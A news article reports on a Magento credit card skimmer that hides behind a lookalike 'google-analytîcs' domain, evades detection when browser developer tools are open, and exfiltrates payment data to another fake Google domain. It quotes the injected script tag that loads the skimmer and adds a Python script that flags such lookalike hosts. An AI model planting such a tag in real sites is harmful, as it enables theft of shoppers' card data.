Malicious 'Google' domains used in Magento card skimmer attacks

Visitors to infected sites are being deceived by the ruse.
Written by Charlie Osborne, Contributing Writer

Threat actors are using fake but convincing Google domains to fool website visitors into thinking infected websites are safe when making online transactions. 

On Thursday, researchers from Sucuri said that in a recent case reported by a Magento website owner, a domain had been infected with a credit card skimmer whose JavaScript code linked to the malicious internationalized domain google-analytîcs[.]com.

An example of the code is below:

<script type="text/javascript" src="//google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js"></script>

"Website visitors may see a reputable name (like "Google") in requests and assume that they're safe to load, without noticing that the domain is not a perfect match and is actually malicious in nature," the researchers say. 
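As an added example (not code from the article or from Sucuri), the following Python script audits a page's <script> sources for the lookalike pattern described above: it flags any script host containing non-ASCII (internationalized) characters, reporting its punycode form, and any host outside an allowlist. The allowlist and the sample page are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts a given store legitimately loads scripts from (constructed sample allowlist).
ALLOWED_HOSTS = {"www.google-analytics.com", "google-analytics.com",
                 "www.googletagmanager.com"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value.strip())


def host_of(src):
    """Extract the lowercase hostname; protocol-relative //host/path URLs are common in injections."""
    if src.startswith("//"):
        src = "https:" + src
    return (urlsplit(src).hostname or "").lower()


def audit_script_hosts(html, allowed=ALLOWED_HOSTS):
    """Return (host, punycode_host, reason) for each external script that deserves a look."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        host = host_of(src)
        if not host:
            continue  # relative path served from the store's own origin
        ascii_host = host.encode("idna").decode("ascii")  # IDN labels become xn--...
        if ascii_host != host:
            findings.append((host, ascii_host, "internationalized (IDN) hostname"))
        elif host not in allowed:
            findings.append((host, ascii_host, "host not in allowlist"))
    return findings


# Constructed sample page modelled on the injection described in the article.
SAMPLE_HTML = """
<script src="/static/frontend/Magento/luma/en_US/requirejs/require.js"></script>
<script type="text/javascript" src="//google-analytîcs.com/www.example.com/3f5cf4657d5d9.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>
"""

if __name__ == "__main__":
    for host, ascii_host, reason in audit_script_hosts(SAMPLE_HTML):
        print(f"{host} ({ascii_host}): {reason}")
```

Reviewing the punycode form matters because logs and blocklists usually record the xn-- name, not the rendered lookalike.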


The website owner was made aware of a problem after being blacklisted. Sucuri's investigation revealed that the data capture element of the card skimmer is similar to others in the wild and uses JavaScript to covertly siphon and store any input data as well as drop-down menu selections.

However, the code changes tactics depending on whether developer tools are open in either the Google Chrome or Mozilla Firefox browser. The skimmer will not attempt to grab any information in these scenarios, which is likely an attempt to avoid detection.


The card skimmer supports "dozens" of payment gateways, Sucuri says, and if developer tools are not detected, stolen information is sent to a remote server -- once again disguised with another fraudulent domain, google[.]ssl[.]lnfo[.]cc. 


Card skimmers, installed through vulnerable e-commerce websites, are a widespread occurrence. In July, RiskIQ said a recent 'spray-and-pray' campaign proved to be successful for the Magecart hacking group, which had managed to infect over 17,000 websites with card-skimming malware in just a few months.

Magento users, like WordPress and Drupal users, are always advised to keep their software builds up-to-date. Magento domains are a common target of cyberattackers seeking to harvest financial data, with an estimated 83 percent of Magento websites reported as vulnerable to skimmers in 2018.

ZDNet has reached out to Google and will update if we hear back.
